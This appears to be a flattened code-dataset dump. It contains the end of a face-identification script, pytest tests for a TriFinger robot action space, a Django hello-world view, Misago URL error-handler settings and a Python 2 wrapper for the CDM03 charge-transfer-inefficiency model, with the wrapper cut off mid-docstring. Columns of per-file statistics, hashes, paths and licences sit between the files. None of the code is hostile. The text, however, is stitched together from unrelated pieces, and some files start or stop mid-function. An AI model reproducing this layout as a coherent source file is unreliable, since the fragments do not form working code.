# Test.
fi = FaceIdentifier(conf)
ts = time.time()
#fi.register_facial_ids()
fi.test()
te = time.time()
print('Elasped time: {0:f}s'.format(te-ts))
elif conf['fi_conf']['mode'] == 'fid_db':
fi = FaceIdentifier(conf)
ts = time.time()
fi.make_facial_ids_db()
#fi.register_facial_ids()
te = time.time()
print('Elasped time: {0:f}s'.format(te-ts))
if __name__ == '__main__':
main()
| 43.809685
| 146
| 0.459322
| 8,778
| 77,806
| 3.845523
| 0.060606
| 0.034661
| 0.026543
| 0.036023
| 0.82806
| 0.814403
| 0.803294
| 0.791356
| 0.773907
| 0.765523
| 0
| 0.024731
| 0.432486
| 77,806
| 1,776
| 147
| 43.809685
| 0.739741
| 0.071601
| 0
| 0.795638
| 0
| 0.002423
| 0.054929
| 0.011635
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015347
| false
| 0.000808
| 0.028271
| 0.001616
| 0.054927
| 0.011309
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f13668deb7c541b069d74ab98cddb65ca472bf6
| 14,085
|
py
|
Python
|
tests/causal_world/envs/robot/test_action.py
|
michaelfeil/CausalWorld
|
ff866159ef0ee9c407893ae204e93eb98dd68be2
|
[
"MIT"
] | 2
|
2021-09-22T08:20:12.000Z
|
2021-11-16T14:20:45.000Z
|
tests/causal_world/envs/robot/test_action.py
|
michaelfeil/CausalWorld
|
ff866159ef0ee9c407893ae204e93eb98dd68be2
|
[
"MIT"
] | null | null | null |
tests/causal_world/envs/robot/test_action.py
|
michaelfeil/CausalWorld
|
ff866159ef0ee9c407893ae204e93eb98dd68be2
|
[
"MIT"
] | null | null | null |
from causal_world.envs.robot.action import TriFingerAction
import math
import numpy as np
import pytest
@pytest.fixture(scope='module')
def as_jp_norm():
return TriFingerAction(action_mode="joint_positions",
normalize_actions=True)
@pytest.fixture(scope='module')
def as_jp_full():
return TriFingerAction(action_mode="joint_positions",
normalize_actions=False)
@pytest.fixture(scope='module')
def as_jt_norm():
return TriFingerAction(action_mode="joint_torques", normalize_actions=True)
@pytest.fixture(scope='module')
def as_jt_full():
return TriFingerAction(action_mode="joint_torques", normalize_actions=False)
@pytest.fixture(scope='module')
def as_default():
return TriFingerAction()
@pytest.fixture(scope='module')
def as_custom():
return TriFingerAction(normalize_actions=False)
upper_99_normalized_action = np.array([0.99] * 9)
upper_100_normalized_action = np.array([1.0] * 9)
upper_101_normalized_action = np.array([1.01] * 9)
lower_99_normalized_action = np.array([-0.99] * 9)
lower_100_normalized_action = np.array([-1.0] * 9)
lower_101_normalized_action = np.array([-1.01] * 9)
upper_100_denormalized_jt_action = np.array([0.36] * 9)
lower_100_denormalized_jt_action = np.array([-0.36] * 9)
lower_100_denormalized_jp_action = np.array(
[-1.57, -1.2, -3.0] * 3)
upper_100_denormalized_jp_action = np.array(
[1.0, 1.57, 3.0] * 3)
normalized_action_to_be_clipped = np.array(
[-1.01, 2.0, 0.5, 0.4, 1.3, -6.0, 0.0, 0.3, 1.1])
normalized_action_clipped = np.array(
[-1.0, 1.0, 0.5, 0.4, 1.0, -1.0, 0.0, 0.3, 1.0])
custom_action_upper_bound = np.array([1, 2, 3, 4])
custom_action_lower_bound = np.array([0, 1, -3, -10])
custom_action_norm_upper_bound = np.array([1, 1, 1, 1])
custom_action_norm_lower_bound = np.array([-1, -1, -1, -1])
def test_set_action_space(as_custom):
as_custom.set_action_space(custom_action_lower_bound,
custom_action_upper_bound)
assert (as_custom.get_action_space().low == custom_action_lower_bound).all()
assert (
as_custom.get_action_space().high == custom_action_upper_bound).all()
assert (as_custom.normalize_action(custom_action_upper_bound) ==
custom_action_norm_upper_bound).all()
assert (as_custom.normalize_action(custom_action_lower_bound) ==
custom_action_norm_lower_bound).all
def test_get_action_space(as_default, as_jt_full, as_jt_norm, as_jp_full,
as_jp_norm):
assert (as_default.get_action_space().low == -1.).all()
assert (as_jp_norm.get_action_space().low == -1.).all()
assert (as_jt_norm.get_action_space().low == -1.).all()
assert (as_default.get_action_space().high == 1.).all()
assert (as_jp_norm.get_action_space().high == 1.).all()
assert (as_jt_norm.get_action_space().high == 1.).all()
assert (as_jp_full.get_action_space().low ==
lower_100_denormalized_jp_action).all()
assert (as_jt_full.get_action_space().low ==
lower_100_denormalized_jt_action).all()
assert (as_jp_full.get_action_space().high ==
upper_100_denormalized_jp_action).all()
assert (as_jt_full.get_action_space().high ==
upper_100_denormalized_jt_action).all()
def test_is_normalized(as_default, as_jt_full, as_jt_norm, as_jp_full,
as_jp_norm):
assert as_default.is_normalized()
assert as_jt_norm.is_normalized()
assert not as_jt_full.is_normalized()
assert as_jt_norm.is_normalized()
assert not as_jp_full.is_normalized()
def test_satisfy_constraints(as_default, as_jt_full, as_jt_norm, as_jp_full,
as_jp_norm):
assert as_default.satisfy_constraints(upper_99_normalized_action)
assert not as_default.satisfy_constraints(upper_100_normalized_action)
assert not as_default.satisfy_constraints(upper_101_normalized_action)
assert as_jt_norm.satisfy_constraints(upper_99_normalized_action)
assert not as_jt_norm.satisfy_constraints(upper_100_normalized_action)
assert not as_jt_norm.satisfy_constraints(upper_101_normalized_action)
assert as_jt_full.satisfy_constraints(
as_jt_full.denormalize_action(upper_99_normalized_action))
assert not as_jt_full.satisfy_constraints(
as_jt_full.denormalize_action(upper_100_normalized_action))
assert not as_jt_full.satisfy_constraints(
as_jt_full.denormalize_action(upper_101_normalized_action))
assert as_jp_norm.satisfy_constraints(upper_99_normalized_action)
assert not as_jp_norm.satisfy_constraints(upper_100_normalized_action)
assert not as_jp_norm.satisfy_constraints(upper_101_normalized_action)
assert as_jp_full.satisfy_constraints(
as_jp_full.denormalize_action(upper_99_normalized_action))
assert not as_jp_full.satisfy_constraints(
as_jp_full.denormalize_action(upper_100_normalized_action))
assert not as_jp_full.satisfy_constraints(
as_jp_full.denormalize_action(upper_101_normalized_action))
assert as_default.satisfy_constraints(lower_99_normalized_action)
assert not as_default.satisfy_constraints(lower_100_normalized_action)
assert not as_default.satisfy_constraints(lower_101_normalized_action)
assert as_jt_norm.satisfy_constraints(lower_99_normalized_action)
assert not as_jt_norm.satisfy_constraints(lower_100_normalized_action)
assert not as_jt_norm.satisfy_constraints(lower_101_normalized_action)
assert as_jt_full.satisfy_constraints(
as_jt_full.denormalize_action(lower_99_normalized_action))
assert not as_jt_full.satisfy_constraints(
as_jt_full.denormalize_action(lower_100_normalized_action))
assert not as_jt_full.satisfy_constraints(
as_jt_full.denormalize_action(lower_101_normalized_action))
assert as_jp_norm.satisfy_constraints(lower_99_normalized_action)
assert not as_jp_norm.satisfy_constraints(lower_100_normalized_action)
assert not as_jp_norm.satisfy_constraints(lower_101_normalized_action)
assert as_jp_full.satisfy_constraints(
as_jp_full.denormalize_action(lower_99_normalized_action))
assert not as_jp_full.satisfy_constraints(
as_jp_full.denormalize_action(lower_100_normalized_action))
assert not as_jp_full.satisfy_constraints(
as_jp_full.denormalize_action(lower_101_normalized_action))
def test_clip_action(as_default, as_jt_full, as_jt_norm, as_jp_full,
as_jp_norm):
assert (as_default.clip_action(upper_99_normalized_action) ==
upper_99_normalized_action).all()
assert (as_default.clip_action(lower_99_normalized_action) ==
lower_99_normalized_action).all()
assert (as_default.clip_action(upper_100_normalized_action) ==
upper_100_normalized_action).all()
assert (as_default.clip_action(lower_100_normalized_action) ==
lower_100_normalized_action).all()
assert (as_default.clip_action(upper_101_normalized_action) ==
upper_100_normalized_action).all()
assert (as_default.clip_action(lower_101_normalized_action) ==
lower_100_normalized_action).all()
assert (as_default.clip_action(normalized_action_to_be_clipped) ==
normalized_action_clipped).all()
assert (as_jt_norm.clip_action(normalized_action_to_be_clipped) ==
normalized_action_clipped).all()
assert (as_jp_norm.clip_action(normalized_action_to_be_clipped) ==
normalized_action_clipped).all()
assert as_jp_full.clip_action(
as_jp_full.denormalize_action(
normalized_action_to_be_clipped)) == pytest.approx(
as_jp_full.denormalize_action(normalized_action_clipped))
def test_normalize_action(as_default, as_jt_full, as_jt_norm, as_jp_full,
as_jp_norm):
assert (as_default.normalize_action(upper_100_denormalized_jp_action) ==
upper_100_normalized_action).all()
assert (as_jp_full.normalize_action(upper_100_denormalized_jp_action) ==
upper_100_normalized_action).all()
assert (as_jp_norm.normalize_action(upper_100_denormalized_jp_action) ==
upper_100_normalized_action).all()
assert (as_jt_full.normalize_action(upper_100_denormalized_jt_action) ==
upper_100_normalized_action).all()
assert (as_jt_norm.normalize_action(upper_100_denormalized_jt_action) ==
upper_100_normalized_action).all()
assert (as_jt_full.normalize_action(upper_100_denormalized_jp_action) !=
upper_100_normalized_action).all()
assert (as_jt_norm.normalize_action(upper_100_denormalized_jp_action) !=
upper_100_normalized_action).all()
assert (as_jp_full.normalize_action(upper_100_denormalized_jt_action) !=
upper_100_normalized_action).all()
assert (as_jp_norm.normalize_action(upper_100_denormalized_jt_action) !=
upper_100_normalized_action).all()
assert (as_default.normalize_action(lower_100_denormalized_jp_action) ==
lower_100_normalized_action).all()
assert (as_jp_full.normalize_action(lower_100_denormalized_jp_action) ==
lower_100_normalized_action).all()
assert (as_jp_norm.normalize_action(lower_100_denormalized_jp_action) ==
lower_100_normalized_action).all()
assert (as_jt_full.normalize_action(lower_100_denormalized_jt_action) ==
lower_100_normalized_action).all()
assert (as_jt_norm.normalize_action(lower_100_denormalized_jt_action) ==
lower_100_normalized_action).all()
assert (as_jt_full.normalize_action(lower_100_denormalized_jp_action) !=
lower_100_normalized_action).all()
assert (as_jt_norm.normalize_action(lower_100_denormalized_jp_action) !=
lower_100_normalized_action).all()
assert (as_jp_full.normalize_action(lower_100_denormalized_jt_action) !=
lower_100_normalized_action).all()
assert (as_jp_norm.normalize_action(lower_100_denormalized_jt_action) !=
lower_100_normalized_action).all()
# convert back and forth
assert as_jp_norm.denormalize_action(
as_jp_norm.normalize_action(upper_100_denormalized_jp_action)
) == pytest.approx(upper_100_denormalized_jp_action)
assert as_jt_norm.denormalize_action(
as_jt_norm.normalize_action(upper_100_denormalized_jt_action)
) == pytest.approx(upper_100_denormalized_jt_action)
assert as_jp_norm.denormalize_action(
as_jp_norm.normalize_action(lower_100_denormalized_jp_action)
) == pytest.approx(lower_100_denormalized_jp_action)
assert as_jt_norm.denormalize_action(
as_jt_norm.normalize_action(lower_100_denormalized_jt_action)
) == pytest.approx(lower_100_denormalized_jt_action)
def test_denormalize_action(as_default, as_jt_full, as_jt_norm, as_jp_full,
as_jp_norm):
assert as_default.denormalize_action(
upper_100_normalized_action) == pytest.approx(
upper_100_denormalized_jp_action)
assert as_jp_full.denormalize_action(
upper_100_normalized_action) == pytest.approx(
upper_100_denormalized_jp_action)
assert as_jp_norm.denormalize_action(
upper_100_normalized_action) == pytest.approx(
upper_100_denormalized_jp_action)
assert as_jt_norm.denormalize_action(
upper_100_normalized_action) == pytest.approx(
upper_100_denormalized_jt_action)
assert as_jt_full.denormalize_action(
upper_100_normalized_action) == pytest.approx(
upper_100_denormalized_jt_action)
assert (as_jt_norm.denormalize_action(upper_100_normalized_action) !=
upper_100_denormalized_jp_action).all()
assert (as_jt_full.denormalize_action(upper_100_normalized_action) !=
upper_100_denormalized_jp_action).all()
assert (as_jp_full.denormalize_action(upper_100_normalized_action) !=
upper_100_denormalized_jt_action).all()
assert (as_jp_norm.denormalize_action(upper_100_normalized_action) !=
upper_100_denormalized_jt_action).all()
assert as_default.denormalize_action(
lower_100_normalized_action) == pytest.approx(
lower_100_denormalized_jp_action)
assert as_jp_full.denormalize_action(
lower_100_normalized_action) == pytest.approx(
lower_100_denormalized_jp_action)
assert as_jp_norm.denormalize_action(
lower_100_normalized_action) == pytest.approx(
lower_100_denormalized_jp_action)
assert as_jt_full.denormalize_action(
lower_100_normalized_action) == pytest.approx(
lower_100_denormalized_jt_action)
assert as_jt_norm.denormalize_action(
lower_100_normalized_action) == pytest.approx(
lower_100_denormalized_jt_action)
assert (as_jt_full.denormalize_action(lower_100_normalized_action) !=
lower_100_denormalized_jp_action).all()
assert (as_jt_norm.denormalize_action(lower_100_normalized_action) !=
lower_100_denormalized_jp_action).all()
assert (as_jp_full.denormalize_action(lower_100_normalized_action) !=
lower_100_denormalized_jt_action).all()
assert (as_jp_norm.denormalize_action(lower_100_normalized_action) !=
lower_100_denormalized_jt_action).all()
# convert back and forth
assert as_jp_norm.denormalize_action(
as_jp_norm.normalize_action(upper_100_denormalized_jp_action)
) == pytest.approx(upper_100_denormalized_jp_action)
assert as_jt_norm.denormalize_action(
as_jt_norm.normalize_action(upper_100_denormalized_jt_action)
) == pytest.approx(upper_100_denormalized_jt_action)
assert as_jp_norm.denormalize_action(
as_jp_norm.normalize_action(lower_100_denormalized_jp_action)
) == pytest.approx(lower_100_denormalized_jp_action)
assert as_jt_norm.denormalize_action(
as_jt_norm.normalize_action(lower_100_denormalized_jt_action)
) == pytest.approx(lower_100_denormalized_jt_action)
| 45.730519
| 80
| 0.754207
| 1,927
| 14,085
| 4.981837
| 0.038921
| 0.156667
| 0.106875
| 0.058438
| 0.942292
| 0.918021
| 0.894583
| 0.871354
| 0.825625
| 0.724479
| 0
| 0.044279
| 0.16301
| 14,085
| 307
| 81
| 45.879479
| 0.77004
| 0.003195
| 0
| 0.466667
| 0
| 0
| 0.006554
| 0
| 0
| 0
| 0
| 0
| 0.403922
| 1
| 0.05098
| false
| 0
| 0.015686
| 0.023529
| 0.090196
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f711418cc2a7272a44c634acc39dd49d66b1d4e
| 176
|
py
|
Python
|
archived/website_apps/hello_world/views.py
|
lsprangers/pa-odesai
|
700ebc8143eccc77ee54a6b693ce401f69fd791f
|
[
"Unlicense"
] | 2
|
2021-05-06T16:05:38.000Z
|
2021-05-06T16:05:48.000Z
|
archived/website_apps/hello_world/views.py
|
lsprangers/pa-odesai
|
700ebc8143eccc77ee54a6b693ce401f69fd791f
|
[
"Unlicense"
] | 1
|
2021-05-07T21:08:17.000Z
|
2021-05-07T21:08:17.000Z
|
archived/website_apps/hello_world/views.py
|
lsprangers/pa-odesai
|
700ebc8143eccc77ee54a6b693ce401f69fd791f
|
[
"Unlicense"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
from django.shortcuts import render
def hello_world(request):
return render(request, 'hello_world.html', {})
| 25.142857
| 50
| 0.772727
| 24
| 176
| 5.583333
| 0.625
| 0.149254
| 0.283582
| 0.373134
| 0.462687
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136364
| 176
| 7
| 50
| 25.142857
| 0.881579
| 0.130682
| 0
| 0.5
| 0
| 0
| 0.105263
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
4f7f04601499488a80d2b3f655a42619b50dec85
| 166
|
py
|
Python
|
misago/core/testproject/urlswitherrorhandlers.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | 1
|
2017-07-25T03:04:36.000Z
|
2017-07-25T03:04:36.000Z
|
misago/core/testproject/urlswitherrorhandlers.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | null | null | null |
misago/core/testproject/urlswitherrorhandlers.py
|
HenryChenV/iJiangNan
|
68f156d264014939f0302222e16e3125119dd3e3
|
[
"MIT"
] | null | null | null |
from .urls import *
handler403 = 'misago.core.testproject.views.mock_custom_403_error_page'
handler404 = 'misago.core.testproject.views.mock_custom_404_error_page'
| 27.666667
| 71
| 0.831325
| 23
| 166
| 5.652174
| 0.652174
| 0.153846
| 0.323077
| 0.4
| 0.553846
| 0.553846
| 0
| 0
| 0
| 0
| 0
| 0.077922
| 0.072289
| 166
| 5
| 72
| 33.2
| 0.766234
| 0
| 0
| 0
| 0
| 0
| 0.674699
| 0.674699
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
96e6894513eda42fd7efaf4c875d6a9b00c89940
| 30,201
|
py
|
Python
|
CTI/CTI.py
|
Borlaff/EuclidVisibleInstrument
|
73a64ad275054d7b1a26f0fe556eae222b65f613
|
[
"BSD-2-Clause"
] | 5
|
2016-12-13T16:58:53.000Z
|
2019-12-29T05:29:00.000Z
|
CTI/CTI.py
|
Borlaff/EuclidVisibleInstrument
|
73a64ad275054d7b1a26f0fe556eae222b65f613
|
[
"BSD-2-Clause"
] | null | null | null |
CTI/CTI.py
|
Borlaff/EuclidVisibleInstrument
|
73a64ad275054d7b1a26f0fe556eae222b65f613
|
[
"BSD-2-Clause"
] | 3
|
2015-07-13T10:01:41.000Z
|
2019-05-28T13:41:47.000Z
|
"""
Charge Transfer Inefficiency
============================
This file contains a simple class to run a CDM03 CTI model developed by Alex Short (ESA).
This now contains both the official CDM03 and a new version that allows different trap
parameters in parallel and serial direction.
:requires: NumPy
:requires: CDM03 (FORTRAN code, f2py -c -m cdm03bidir cdm03bidir.f90)
:author: Sami-Matias Niemi
:contact: s.niemi@ucl.ac.uk
:version: 0.35
"""
import numpy as np
try:
import cdm03bidir
#import cdm03bidirTest as cdm03bidir #for testing purposes only
except ImportError:
print 'No CDM03bidir module available, please compile it: f2py -c -m cdm03bidir cdm03bidir.f90'
#try:
# from numba import autojit
# from numba import jit
# from numba import double, int16
#except:
# print 'No numba available!'
class CDM03bidir():
"""
Class to run CDM03 CTI model, class Fortran routine to perform the actual CDM03 calculations.
:param settings: input parameters
:type settings: dict
:param data: input data to be radiated
:type data: ndarray
:param log: instance to Python logging
:type log: logging instance
"""
def __init__(self, settings, data, log=None):
"""
Class constructor.
:param settings: input parameters
:type settings: dict
:param data: input data to be radiated
:type data: ndarray
:param log: instance to Python logging
:type log: logging instance
"""
self.data = data
self.values = dict(quads=(0,1,2,3), xsize=2048, ysize=2066, dob=0.0, rdose=8.0e9)
self.values.update(settings)
self.log = log
self._setupLogger()
#default CDM03 settings
self.params = dict(beta_p=0.6, beta_s=0.6, fwc=200000., vth=1.168e7, vg=6.e-11, t=20.48e-3,
sfwc=730000., svg=1.0e-10, st=5.0e-6, parallel=1., serial=1.)
#update with inputs
self.params.update(self.values)
#read in trap information
trapdata = np.loadtxt(self.values['parallelTrapfile'])
if trapdata.ndim > 1:
self.nt_p = trapdata[:, 0]
self.sigma_p = trapdata[:, 1]
self.taur_p = trapdata[:, 2]
else:
#only one trap species
self.nt_p = [trapdata[0],]
self.sigma_p = [trapdata[1],]
self.taur_p = [trapdata[2],]
trapdata = np.loadtxt(self.values['serialTrapfile'])
if trapdata.ndim > 1:
self.nt_s = trapdata[:, 0]
self.sigma_s = trapdata[:, 1]
self.taur_s = trapdata[:, 2]
else:
#only one trap species
self.nt_s = [trapdata[0],]
self.sigma_s = [trapdata[1],]
self.taur_s = [trapdata[2],]
#scale thibaut's values
if 'thibaut' in self.values['parallelTrapfile']:
self.nt_p /= 0.576 #thibaut's values traps / pixel
self.sigma_p *= 1.e4 #thibaut's values in m**2
if 'thibaut' in self.values['serialTrapfile']:
self.nt_s *= 0.576 #thibaut's values traps / pixel #should be division?
self.sigma_s *= 1.e4 #thibaut's values in m**2
def _setupLogger(self):
"""
Set up the logger.
"""
self.logger = True
if self.log is None:
self.logger = False
def radiateFullCCD(self):
"""
This routine allows the whole CCD to be run through a radiation damage mode.
The routine takes into account the fact that the amplifiers are in the corners
of the CCD. The routine assumes that the CCD is using four amplifiers.
There is an excess of .copy() calls, which should probably be cleaned up. However,
given that I had problem with the Fortran code, I have kept the calls. If memory
becomes an issue then this should be cleaned.
:return: radiation damaged image
:rtype: ndarray
"""
ydim, xdim = self.data.shape
out = np.zeros((xdim, ydim))
#transpose the data, because Python has different convention than Fortran
data = self.data.transpose().copy()
for quad in self.values['quads']:
if self.logger:
self.log.info('Adding CTI to Q%i' % quad)
if quad == 0:
d = data[0:self.values['xsize'], 0:self.values['ysize']].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[0:self.values['xsize'], 0:self.values['ysize']] = tmp
elif quad == 1:
d = data[self.values['xsize']:, :self.values['ysize']].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[self.values['xsize']:, :self.values['ysize']] = tmp
elif quad == 2:
d = data[:self.values['xsize'], self.values['ysize']:].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[:self.values['xsize'], self.values['ysize']:] = tmp
elif quad == 3:
d = data[self.values['xsize']:, self.values['ysize']:].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[self.values['xsize']:, self.values['ysize']:] = tmp
else:
print 'ERROR -- too many quadrants!!'
self.log.error('Too many quadrants! This method allows only four quadrants.')
return out.transpose()
def radiateFullCCD2(self):
"""
This routine allows the whole CCD to be run through a radiation damage mode.
The routine takes into account the fact that the amplifiers are in the corners
of the CCD. The routine assumes that the CCD is using four amplifiers.
There is an excess of .copy() calls, which should probably be cleaned up. However,
given that I had problem with the Fortran code, I have kept the calls. If memory
becomes an issue then this should be cleaned.
:return: radiation damaged image
:rtype: ndarray
"""
ydim, xdim = self.data.shape
out = np.empty((ydim, xdim))
#transpose the data, because Python has different convention than Fortran
data = self.data.copy()
for quad in self.values['quads']:
if self.logger:
self.log.info('Adding CTI to Q%i' % quad)
if quad == 0:
d = data[:self.values['ysize'], :self.values['xsize']].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[:self.values['ysize'], :self.values['xsize']] = tmp
elif quad == 1:
d = data[:self.values['ysize'], self.values['xsize']:].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[:self.values['ysize'], self.values['xsize']:] = tmp
elif quad == 2:
d = data[self.values['ysize']:, :self.values['xsize']].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[self.values['ysize']:, :self.values['xsize']] = tmp
elif quad == 3:
d = data[self.values['ysize']:, self.values['xsize']:].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[self.values['ysize']:, self.values['xsize']:] = tmp
else:
print 'ERROR -- too many quadrants!!'
self.log.error('Too many quadrants! This method allows only four quadrants.')
return out
def applyRadiationDamage(self, data, iquadrant=0):
"""
Apply radian damage based on FORTRAN CDM03 model. The method assumes that
input data covers only a single quadrant defined by the iquadrant integer.
:param data: imaging data to which the CDM03 model will be applied to.
:type data: ndarray
:param iquandrant: number of the quadrant to process
:type iquandrant: int
cdm03 - Function signature::
sout = cdm03(sinp,iflip,jflip,dob,rdose,in_nt,in_sigma,in_tr,[xdim,ydim,zdim])
Required arguments:
sinp : input rank-2 array('d') with bounds (xdim,ydim)
iflip : input int
jflip : input int
dob : input float
rdose : input float
in_nt : input rank-1 array('d') with bounds (zdim)
in_sigma : input rank-1 array('d') with bounds (zdim)
in_tr : input rank-1 array('d') with bounds (zdim)
Optional arguments:
xdim := shape(sinp,0) input int
ydim := shape(sinp,1) input int
zdim := len(in_nt) input int
Return objects:
sout : rank-2 array('d') with bounds (xdim,ydim)
.. Note:: Because Python/NumPy arrays are different row/column based, one needs
to be extra careful here. NumPy.asfortranarray will be called to get
an array laid out in Fortran order in memory. Before returning the
array will be laid out in memory in C-style (row-major order).
:return: image that has been run through the CDM03 model
:rtype: ndarray
"""""
iflip = iquadrant / 2
jflip = iquadrant % 2
params = [self.params['beta_p'], self.params['beta_s'], self.params['fwc'], self.params['vth'],
self.params['vg'], self.params['t'], self.params['sfwc'], self.params['svg'], self.params['st'],
self.params['parallel'], self.params['serial']]
if self.logger:
self.log.info('nt_p=' + str(self.nt_p))
self.log.info('nt_s=' + str(self.nt_s))
self.log.info('sigma_p= ' + str(self.sigma_p))
self.log.info('sigma_s= ' + str(self.sigma_s))
self.log.info('taur_p= ' + str(self.taur_p))
self.log.info('taur_s= ' + str(self.taur_s))
self.log.info('dob=%f' % self.values['dob'])
self.log.info('rdose=%e' % self.values['rdose'])
self.log.info('xsize=%i' % data.shape[1])
self.log.info('ysize=%i' % data.shape[0])
self.log.info('quadrant=%i' % iquadrant)
self.log.info('iflip=%i' % iflip)
self.log.info('jflip=%i' % jflip)
CTIed = cdm03bidir.cdm03(np.asfortranarray(data),
jflip, iflip,
self.values['dob'], self.values['rdose'],
self.nt_p, self.sigma_p, self.taur_p,
self.nt_s, self.sigma_s, self.taur_s,
params,
[data.shape[0], data.shape[1], len(self.nt_p), len(self.nt_s), len(self.params)])
return np.asanyarray(CTIed)
class CDM03():
"""
Class to run CDM03 CTI model, class Fortran routine to perform the actual CDM03 calculations.
:param data: input data to be radiated
:type data: ndarray
:param input: input parameters
:type input: dictionary
:param log: instance to Python logging
:type log: logging instance
"""
def __init__(self, input, data, log=None):
"""
Class constructor.
:param data: input data to be radiated
:type data: ndarray
:param input: input parameters
:type input: dictionary
:param log: instance to Python logging
:type log: logging instance
"""
try:
import cdm03
except ImportError:
print 'No CDM03 module available, please compile it: f2py -c -m cdm03 cdm03.f90'
self.data = data
self.values = dict(quads=(0,1,2,3), xsize=2048, ysize=2066, dob=0.0, rdose=8.0e9)
self.values.update(input)
self.log = log
self._setupLogger()
def _setupLogger(self):
"""
Set up the logger.
"""
self.logger = True
if self.log is None:
self.logger = False
def radiateFullCCD(self):
"""
This routine allows the whole CCD to be run through a radiation damage mode.
The routine takes into account the fact that the amplifiers are in the corners
of the CCD. The routine assumes that the CCD is using four amplifiers.
There is an excess of .copy() calls, which should probably be cleaned up. However,
given that I had problem with the Fortran code, I have kept the calls. If memory
becomes an issue then this should be cleaned.
:return: radiation damaged image
:rtype: ndarray
"""
ydim, xdim = self.data.shape
out = np.zeros((xdim, ydim))
#transpose the data, because Python has different convention than Fortran
data = self.data.transpose().copy()
for quad in self.values['quads']:
if self.logger:
self.log.info('Adding CTI to Q%i' % quad)
if quad == 0:
d = data[0:self.values['xsize'], 0:self.values['ysize']].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[0:self.values['xsize'], 0:self.values['ysize']] = tmp
elif quad == 1:
d = data[self.values['xsize']:, :self.values['ysize']].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[self.values['xsize']:, :self.values['ysize']] = tmp
elif quad == 2:
d = data[:self.values['xsize'], self.values['ysize']:].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[:self.values['xsize'], self.values['ysize']:] = tmp
elif quad == 3:
d = data[self.values['xsize']:, self.values['ysize']:].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[self.values['xsize']:, self.values['ysize']:] = tmp
else:
print 'ERROR -- too many quadrants!!'
self.log.error('Too many quadrants! This method allows only four quadrants.')
return out.transpose()
def radiateFullCCD2(self):
"""
This routine allows the whole CCD to be run through a radiation damage mode.
The routine takes into account the fact that the amplifiers are in the corners
of the CCD. The routine assumes that the CCD is using four amplifiers.
There is an excess of .copy() calls, which should probably be cleaned up. However,
given that I had problem with the Fortran code, I have kept the calls. If memory
becomes an issue then this should be cleaned.
:return: radiation damaged image
:rtype: ndarray
"""
ydim, xdim = self.data.shape
out = np.empty((ydim, xdim))
#transpose the data, because Python has different convention than Fortran
data = self.data.copy()
for quad in self.values['quads']:
if self.logger:
self.log.info('Adding CTI to Q%i' % quad)
if quad == 0:
d = data[:self.values['ysize'], :self.values['xsize']].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[:self.values['ysize'], :self.values['xsize']] = tmp
elif quad == 1:
d = data[:self.values['ysize'], self.values['xsize']:].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[:self.values['ysize'], self.values['xsize']:] = tmp
elif quad == 2:
d = data[self.values['ysize']:, :self.values['xsize']].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[self.values['ysize']:, :self.values['xsize']] = tmp
elif quad == 3:
d = data[self.values['ysize']:, self.values['xsize']:].copy()
tmp = self.applyRadiationDamage(d, iquadrant=quad).copy()
out[self.values['ysize']:, self.values['xsize']:] = tmp
else:
print 'ERROR -- too many quadrants!!'
self.log.error('Too many quadrants! This method allows only four quadrants.')
return out
def applyRadiationDamage(self, data, iquadrant=0):
"""
Apply radian damage based on FORTRAN CDM03 model. The method assumes that
input data covers only a single quadrant defined by the iquadrant integer.
:param data: imaging data to which the CDM03 model will be applied to.
:type data: ndarray
:param iquandrant: number of the quadrant to process
:type iquandrant: int
cdm03 - Function signature::
sout = cdm03(sinp,iflip,jflip,dob,rdose,in_nt,in_sigma,in_tr,[xdim,ydim,zdim])
Required arguments:
sinp : input rank-2 array('d') with bounds (xdim,ydim)
iflip : input int
jflip : input int
